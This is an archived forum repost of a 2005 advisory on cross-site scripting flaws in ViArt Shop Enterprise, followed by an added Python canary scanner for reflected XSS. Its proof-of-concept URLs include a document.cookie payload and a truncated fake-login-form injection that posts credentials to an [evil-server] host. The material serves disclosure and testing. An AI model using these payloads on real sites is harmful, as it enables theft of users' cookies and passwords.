EvilOctal Security Team Technical Discussion Group's Archiver

冰血封情 2005-5-2 15:15

[Repost] Multiple cross-site scripting vulnerabilities in ViArt Shop Enterprise and how to test for them

  Source: lostmon@gmail.com

ViArt Shop contains a flaw that allows a remote cross-site scripting
attack. The flaw exists because the application does not validate
multiple variables upon submission to multiple scripts and echoes them
back into the page without output encoding. This allows an attacker to
create a specially crafted URL (or, in the forum, a specially crafted post)
that executes arbitrary script in a user's browser within the trust
relationship between the browser and the server, leading to a loss of integrity.

##########
versions:
##########

ViArt Shop Enterprise v2.1.6 is affected.
Prior versions are possibly affected as well.

##########
Solution:
##########

Currently, there are no known upgrades, patches, or workarounds
available to correct these issues.

#########
timeline:
#########

discovered: 25 April 2005
vendor notified: 28 April 2005
vendor response:
vendor fix:
disclosure: 29 April 2005

########## Proof of concept ##############
############
basket.php
###########

The rp ("return page") parameter carries a URL-encoded products.php query; the payload goes inside that nested query.

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0[XSS-CODE]%26search_string%3Dss%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3D[XSS-CODE]%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D[XSS-CODE]

###########
forum.php
###########

http://[victim]/forum_new_thread.php

The form fields nickname, email, topic and message are vulnerable to (stored) XSS.

To exploit the email field you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com

http://[victim]/forum_thread.php?thread_id=2

When replying to a post, the nickname and message fields are vulnerable to XSS.

All of these payloads execute whenever a user views the forum, or when the admin
opens "forum threads" under the forum menu of the admin panel.

###########
page.php
###########

http://[victim]/page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

The second URL injects a fake login form that posts the victim's credentials to [evil-server]; the published payload is cut off at the end.

http://[victim]/page.php?page=%3Cp%3Ean%20eror%20was%20send%20to%20webmaster,%20please%20insert%20your%20username%20and%20password%20,%20and%20continue%20shopping%20%3Cform%20action=%22http://[evil-server]/save.php%22%20method=%22post%22%3EUsername:%3Cinput%20name=%22username%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3Cinput%20name=%22password%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3E%3Cinput%20name=%

############
reviews.php
############

http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[victim]/reviews.php?category_id=0[XSS-CODE]&item_id=4

http://[victim]/reviews.php?filter=0&item_id=4[XSS-CODE]&category_id=0

#################
products.php
#################

http://[victim]/product_details.php?item_id=4&category_id=0[XSS-CODE]

http://[victim]/products.php?category_id=13[XSS-CODE]

http://[victim]/products.php?category_id=0&search_string=[XSS-CODE]&search_category_id=

##################
news_view.php
##################

http://[victim]/news_view.php?news_id=3&rp=news.php[XSS-CODE]&page=1

http://[victim]/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE]
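The PoC URLs above all follow the same pattern: a placeholder [XSS-CODE] in one query parameter, and a page that echoes that parameter back unencoded. The script below is an added example, not part of lostmon's advisory or of ViArt Shop's code. It turns the pattern into a repeatable check: a harmless canary is substituted for [XSS-CODE], the page is fetched through a caller-supplied fetch function, and the response is searched for the canary in unescaped form. The two fetch stand-ins (fetch_vulnerable, fetch_fixed), the host name shop.example and the email regexes are constructed for the example and never touch the network; the email part shows why the advisory's [XSS-CODE]@email.com trick gets past a loose "has an @ and a dot" validator on the forum form.

```python
"""Reflected-XSS canary check for the PoC URLs in the advisory.

Added example (not part of lostmon's advisory or of ViArt Shop). It swaps a
canary into each [XSS-CODE] placeholder, fetches the page through a
caller-supplied fetch() and reports whether the canary comes back unescaped.
The two fetch() functions below are constructed stubs for a vulnerable and a
hardened page; they do not reproduce ViArt Shop's real code.
"""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

PLACEHOLDER = "[XSS-CODE]"
# Harmless marker that closes an attribute and opens a tag. A real scan would
# use a random token so a cached or pre-seeded page cannot cause a false hit.
CANARY = '"><xsscanary>'

# Three PoC templates taken from the advisory (host filled in at scan time).
POC_URLS = [
    "http://[victim]/products.php?category_id=13[XSS-CODE]",
    "http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]",
    "http://[victim]/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE]",
]


def build_test_url(template, canary=CANARY, host="shop.example"):
    """Fill in the host and URL-encode the canary into the payload slot."""
    return template.replace("[victim]", host).replace(PLACEHOLDER, quote(canary, safe=""))


def reflects_unescaped(body, canary=CANARY):
    """True when the canary appears verbatim in the HTML. An escaped copy
    (&quot;&gt;&lt;xsscanary&gt;) is harmless and is not counted."""
    return canary in body


def _render(url, escape):
    """Constructed page: echo every query parameter into a form, which is the
    behaviour the advisory describes for basket.php, products.php and so on."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    rows = "".join(
        f'<input name="{escape(k)}" value="{escape(v[0])}">' for k, v in params.items()
    )
    return f"<html><body><form>{rows}</form></body></html>"


def fetch_vulnerable(url):
    """Stand-in for the unpatched page: no output encoding at all."""
    return _render(url, lambda s: s)


def fetch_fixed(url):
    """Stand-in for a hardened page: every value is HTML-escaped before it is
    echoed (the PHP equivalent is htmlspecialchars($v, ENT_QUOTES))."""
    return _render(url, lambda s: html.escape(s, quote=True))


def scan(templates, fetch, canary=CANARY):
    """Return the templates whose response reflects the canary unescaped."""
    return [t for t in templates if reflects_unescaped(fetch(build_test_url(t, canary)), canary)]


# Forum email field: [XSS-CODE]@email.com works against a validator that only
# asks for an "@" and a dot. A character whitelist rejects that shape, but
# output encoding at display time is still the actual fix.
EMAIL_LOOSE = re.compile(r"^.+@.+\..+$")
EMAIL_STRICT = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def email_accepted(value, pattern=EMAIL_LOOSE):
    """True if the given validator would let this email value into a post."""
    return pattern.fullmatch(value) is not None


if __name__ == "__main__":
    for name, fetch in (("vulnerable", fetch_vulnerable), ("fixed", fetch_fixed)):
        print(name, "->", scan(POC_URLS, fetch))
    payload = "<script>alert(document.cookie)</script>@email.com"
    print("loose validator accepts payload:", email_accepted(payload))
    print("strict validator accepts payload:", email_accepted(payload, EMAIL_STRICT))
```

To run it against a live installation you own, replace fetch_vulnerable with a function that performs the HTTP GET (for example with urllib.request) and returns the response body; the basket.php templates need the canary encoded twice because it sits inside the nested rp query. A hit only proves unencoded reflection; confirming execution still requires loading the URL in a browser.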

© 1999-2008 EvilOctal Security Team